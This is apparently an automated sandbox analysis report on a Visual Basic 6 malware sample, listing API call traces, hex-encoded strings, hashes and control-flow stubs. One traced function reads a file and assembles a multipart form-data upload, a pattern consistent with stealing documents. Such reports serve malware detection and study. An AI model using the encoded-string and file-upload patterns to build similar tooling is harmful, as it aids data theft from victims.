                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,004016A6,00000001), ref: 0041DEA2
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,?,004016A6,00000001), ref: 0041DEB5
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041DEC9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041DEE4
                                                                                    • __vbaStrMove.MSVBVM60(00000024), ref: 0041DEF7
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,00000024), ref: 0041DF0F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?,?,00000000,00000024), ref: 0041DF15
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,00000024), ref: 0041DF21
                                                                                    • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,00000000,00000000,?,?,00000000,00000024), ref: 0041DF40
                                                                                    • __vbaNew2.MSVBVM60(00416410,0041F010,?,?,?,?,?,?,?,00000002,?,00000000,004016A6), ref: 0041DF62
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041DF9B
                                                                                    • __vbaFreeObj.MSVBVM60(00416410,00416410,00000000), ref: 0041DFAC
                                                                                    Strings
                                                                                    • 310B332A3309221F101360020D382A2C18361A353E0D2A010C275F7F5B4D4053457B6906291B04282F3B03253267241E34, xrefs: 0041DDE6
                                                                                    • $, xrefs: 0041DEBA
                                                                                    • \Microsoft.NET\Framework\v4.0.30319, xrefs: 0041DD73
                                                                                    • ydkcdNdVmfMftNQbtTrWuMhJduDzHOvl, xrefs: 0041DEC1
                                                                                    • $, xrefs: 0041DE06
                                                                                    • NmFZIAfQpvgNLHlvjjWwPIbXjPQkQkcscvJPZhktdN, xrefs: 0041DE0D
                                                                                    • 38260A073C0B25020039483A0B053E3226133A103A07380F293248667F585949535954380F14262107380817267F070C31, xrefs: 0041DE9A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$Free$CopyList$ChkstkError$Bstr$#516#631New2System$#525#537#608#616#632#645AnsiCheckHresultUnicode
                                                                                    • String ID: $$$$310B332A3309221F101360020D382A2C18361A353E0D2A010C275F7F5B4D4053457B6906291B04282F3B03253267241E34$38260A073C0B25020039483A0B053E3226133A103A07380F293248667F585949535954380F14262107380817267F070C31$NmFZIAfQpvgNLHlvjjWwPIbXjPQkQkcscvJPZhktdN$\Microsoft.NET\Framework\v4.0.30319$ydkcdNdVmfMftNQbtTrWuMhJduDzHOvl
                                                                                    • API String ID: 360618581-1763830476
                                                                                    • Opcode ID: 958d3cf736091b8f38591cf3ce60c521b657a7ffc084773a4ddd3bc46b348c00
                                                                                    • Instruction ID: 6ec893211ff7f5e48ca0a4fe9a71a1f85d55f524822d2c43f1188bae9fc95af7
                                                                                    • Opcode Fuzzy Hash: 958d3cf736091b8f38591cf3ce60c521b657a7ffc084773a4ddd3bc46b348c00
                                                                                    • Instruction Fuzzy Hash: 0481AAB2D00208ABDB05FBE1D945ADEB7B9AF04304F50812BF115A7191EF789A4ACB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,004016A6,004014D0,?,?,?,00000000,004016A6), ref: 0041B036
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004016A6,004014D0), ref: 0041B063
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004016A6,004014D0), ref: 0041B06E
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B07E
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B08C
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B09F
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B0AD
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,00000000,?,?,000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6,004014D0), ref: 0041B0B9
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,00000000,?,?,000000FF,?,00417DF4,00000011,?,?,?,00000000,004016A6), ref: 0041B0C5
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,00000000,?,?,000000FF,?,00417DF4,00000011), ref: 0041B0D6
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,00000000,?,00000000,?,?,?,?,00000000,?,?,000000FF,?,00417DF4,00000011), ref: 0041B0E2
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,?,00000000,?,00000000,?,?,?,?,00000000,?,?,000000FF,?), ref: 0041B0F7
                                                                                    • #644.MSVBVM60(0000EC00), ref: 0041B140
                                                                                    • __vbaSetSystemError.MSVBVM60(?,XYYY,00000004,0000EC00), ref: 0041B164
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B19A
                                                                                    • __vbaUbound.MSVBVM60(00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B1CE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B211
                                                                                    • __vbaDerefAry1.MSVBVM60(00000000,?,?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B23B
                                                                                    • __vbaVarVargNofree.MSVBVM60(00000000,?,?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B245
                                                                                    • __vbaI4ErrVar.MSVBVM60(00000000,00000000,?,?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B24B
                                                                                    • __vbaSetSystemError.MSVBVM60(?,XYYYh,00000004,00000000,00000000,?,?,00000068,00000001,00000001,00000000,?,00005059,00000002,?,XYYY), ref: 0041B261
                                                                                    • __vbaSetSystemError.MSVBVM60(?,000000E8,00000001,00000001,00000000,?,00005059,00000002,?,XYYY,00000004,0000EC00), ref: 0041B2A3
                                                                                    • __vbaFreeStr.MSVBVM60(0041B3CD,?,00000000,00000000,00000000,00000000,0000EC00,?,000000C3,00000001,?,XYYY,00000004,?,000000E8,00000001), ref: 0041B3AE
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,59595958,0041B3CD,?,00000000,00000000,00000000,00000000,0000EC00,?,000000C3,00000001,?,XYYY,00000004,?), ref: 0041B3BF
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,59595958,0041B3CD,?,00000000,00000000,00000000,00000000,0000EC00,?,000000C3,00000001,?,XYYY,00000004,?), ref: 0041B3C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$System$Free$AnsiCopyUnicode$#644Ary1ChkstkConstruct2DerefDestructListNofreeUboundVarg
                                                                                    • String ID: XYYY$YP$h
                                                                                    • API String ID: 2846926467-2757690854
                                                                                    • Opcode ID: 5b3f24a8a418aadd79df6c3b227c568927a90f726c94900d428a19600a689473
                                                                                    • Instruction ID: 365810445903687a1c91a06a0412f5d61ff0ae52142e54727611da221bdf1046
                                                                                    • Opcode Fuzzy Hash: 5b3f24a8a418aadd79df6c3b227c568927a90f726c94900d428a19600a689473
                                                                                    • Instruction Fuzzy Hash: 8BB1C5B1D0120DEADB20EFE6C946BDDBBB4EF04308F20802AE510B7292D7795A55DF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E03A
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 0041E05C
                                                                                    • __vbaObjSetAddref.MSVBVM60(?,00000000,00000001,?,?,?,?,004016A6), ref: 0041E06D
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,0000009C), ref: 0041E0AF
                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,004186D4,0000009C), ref: 0041E0C5
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,0000016C), ref: 0041E106
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,00000154), ref: 0041E157
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,00000164), ref: 0041E1A8
                                                                                    • __vbaI2I4.MSVBVM60(00000000,?,004186D4,00000164), ref: 0041E1BF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,0000011C), ref: 0041E200
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004186D4,00000110), ref: 0041E256
                                                                                    • __vbaFpI4.MSVBVM60(00000000,?,004186D4,00000110), ref: 0041E280
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$AddrefChkstkError
                                                                                    • String ID:
                                                                                    • API String ID: 2229015355-0
                                                                                    • Opcode ID: a9303d508419419aab8c37733d7d93ef0f38ad53348e88b6029309d9180fc932
                                                                                    • Instruction ID: 8c9b99be8883720c12bd44c3e0b35c2e78a0c0d7b4579dd7df7701cc16ef5066
                                                                                    • Opcode Fuzzy Hash: a9303d508419419aab8c37733d7d93ef0f38ad53348e88b6029309d9180fc932
                                                                                    • Instruction Fuzzy Hash: D7021575D10228EFDF20ABA2CC45BDDBBB5BB05304F5081EAE549B61A1C7780A94DF29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 00418990
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,?,004016A6), ref: 004189C7
                                                                                    • __vbaNew2.MSVBVM60(00416A80,0041F49C,00000001,?,?,?,?,004016A6), ref: 004189DF
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416A70,00000014), ref: 00418A23
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416A90,00000068), ref: 00418A5E
                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00416A90,00000068), ref: 00418A77
                                                                                    • __vbaEnd.MSVBVM60(00000000,?,00416A90,00000068), ref: 00418A84
                                                                                    • __vbaNew2.MSVBVM60(00416A80,0041F49C), ref: 00418A9C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416A70,00000014), ref: 00418AE0
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00416A90,0000007C), ref: 00418B19
                                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00416A90,0000007C), ref: 00418B2A
                                                                                    • __vbaStrMove.MSVBVM60(00000015), ref: 00418B44
                                                                                    • __vbaStrCat.MSVBVM60(004170F4,00000000,00000015), ref: 00418B4F
                                                                                    • __vbaStrMove.MSVBVM60(004170F4,00000000,00000015), ref: 00418B5B
                                                                                    • __vbaFreeStr.MSVBVM60(004170F4,00000000,00000015), ref: 00418B63
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004168F4,000002B4), ref: 00418B91
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 00418BB2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004170F8,00000064), ref: 00418BDF
                                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,004170F8,00000064), ref: 00418BF0
                                                                                    • __vbaFreeVar.MSVBVM60(?), ref: 00418C01
                                                                                    • __vbaExitProc.MSVBVM60(?), ref: 00418C06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$CheckHresult$Free$MoveNew2$ChkstkErrorExitProc
                                                                                    • String ID:
                                                                                    • API String ID: 3776675287-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000015,004016A6,00000001,?,?,?,?,004016A6), ref: 0041AB17
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB47
                                                                                    • __vbaStrCopy.MSVBVM60(000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB5B
                                                                                    • __vbaNew2.MSVBVM60(00416410,0041F010,000000FF,?,?,?,00000015,004016A6,00000001), ref: 0041AB7A
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,004168F4,00000058), ref: 0041ABBE
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,000000FF), ref: 0041ABE0
                                                                                    • #525.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC07
                                                                                    • __vbaStrMove.MSVBVM60(00000104,?,?,000000FF), ref: 0041AC11
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,00000104,?,?,000000FF), ref: 0041AC24
                                                                                    • __vbaSetSystemError.MSVBVM60(000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC35
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC41
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC58
                                                                                    • __vbaInStr.MSVBVM60(00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC78
                                                                                    • #616.MSVBVM60(?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC86
                                                                                    • __vbaStrMove.MSVBVM60(?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?,?,000000FF), ref: 0041AC90
                                                                                    • __vbaStrCat.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041AC9B
                                                                                    • __vbaStrMove.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041ACA5
                                                                                    • __vbaFreeStr.MSVBVM60(0041720C,00000000,?,-00000001,00000000,00417AAC,?,00000001,?,?,000000FF,00000000,?,?,00000104,?), ref: 0041ACAD
                                                                                    • __vbaFreeStr.MSVBVM60(0041ACDD,?,?,000000FF), ref: 0041ACD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFreeMove$System$#525#616AnsiCheckChkstkCopyHresultNew2Unicode
                                                                                    • String ID:
                                                                                    • API String ID: 3774617751-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 703 416d94-416d9b 704 416d9d 703->704 705 416d9f-416da4 703->705 704->705 706 416dab 705->706 706->706
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 707 416e54-416e5b 708 416e5d 707->708 709 416e5f-416e64 707->709 708->709 710 416e6b 709->710 710->710
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 711 416ea4-416eab 712 416ead 711->712 713 416eaf-416eb4 711->713 712->713 714 416ebb 713->714 714->714
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.528409980.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.528363867.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529257275.000000000041F000.00000004.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.529271072.0000000000420000.00000002.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_lg3gn9y1cj.jbxd
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,004016A6), ref: 0041A41D
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004016A6), ref: 0041A45E
                                                                                    • #648.MSVBVM60(0000000A), ref: 0041A47C
                                                                                    • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041A488
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,?,00000000,0000000A), ref: 0041A4A3
                                                                                    • #570.MSVBVM60(?,00000120,000000FF,?,00000000,0000000A), ref: 0041A4B2
                                                                                    • #570.MSVBVM60(?,00000000,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A4CB
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,?,00000000,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A4E9
                                                                                    • __vbaGetOwner3.MSVBVM60(004175BC,?,?,?,000000FF,?,?,?,?,004016A6), ref: 0041A504
                                                                                    • #717.MSVBVM60(?,00006011,00000040,00000000), ref: 0041A52F
                                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041A538
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041A542
                                                                                    • __vbaFreeVar.MSVBVM60(?,?,00006011,00000040,00000000), ref: 0041A54A
                                                                                    • __vbaFileClose.MSVBVM60(?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A559
                                                                                    • #709.MSVBVM60(00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A573
                                                                                    • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A596
                                                                                    • __vbaStrMove.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A5A0
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A5AB
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000,0000000A), ref: 0041A5B5
                                                                                    • __vbaStrCat.MSVBVM60(Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000), ref: 0041A5C0
                                                                                    • __vbaStrMove.MSVBVM60(Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?,00000120,000000FF,?,00000000), ref: 0041A5CA
                                                                                    • #631.MSVBVM60(00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?), ref: 0041A5E9
                                                                                    • __vbaStrMove.MSVBVM60(00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?,?), ref: 0041A5F3
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?), ref: 0041A5F9
                                                                                    • __vbaStrMove.MSVBVM60(00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF,00000000,?), ref: 0041A603
                                                                                    • __vbaStrCat.MSVBVM60(00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF), ref: 0041A60E
                                                                                    • __vbaStrMove.MSVBVM60(00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000,004170F4,000000FF), ref: 0041A618
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000), ref: 0041A623
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,004175D8,00000000), ref: 0041A62D
                                                                                    • __vbaStrCat.MSVBVM60(Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113), ref: 0041A638
                                                                                    • __vbaStrMove.MSVBVM60(Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113), ref: 0041A642
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0), ref: 0041A64D
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename=",00000000,004170B0), ref: 0041A657
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename="), ref: 0041A662
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A,00000000,Content-Disposition: form-data; name="document"; filename="), ref: 0041A66C
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A), ref: 0041A675
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000,?,0000000A), ref: 0041A67F
                                                                                    • __vbaStrCat.MSVBVM60(004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000), ref: 0041A68A
                                                                                    • __vbaStrMove.MSVBVM60(004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000,00000000,00000000), ref: 0041A694
                                                                                    • __vbaStrCat.MSVBVM60(004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000), ref: 0041A69F
                                                                                    • __vbaStrMove.MSVBVM60(004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000,00417670,00000000), ref: 0041A6A9
                                                                                    • __vbaStrCat.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000,004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000), ref: 0041A6B4
                                                                                    • __vbaStrMove.MSVBVM60(3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000,004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000,004170B0,00000000), ref: 0041A6BE
                                                                                    • __vbaStrCat.MSVBVM60(004175D8,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000,004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000), ref: 0041A6C9
                                                                                    • __vbaStrMove.MSVBVM60(004175D8,00000000,3fbd04f5-b1ed-4060-99b9-fca7ff59c113,00000000,004175D8,00000000,004170B0,00000000,?,00000000,004170B0,00000000,004170B0,00000000,Content-Type: application/octet-stream,00000000), ref: 0041A6D3
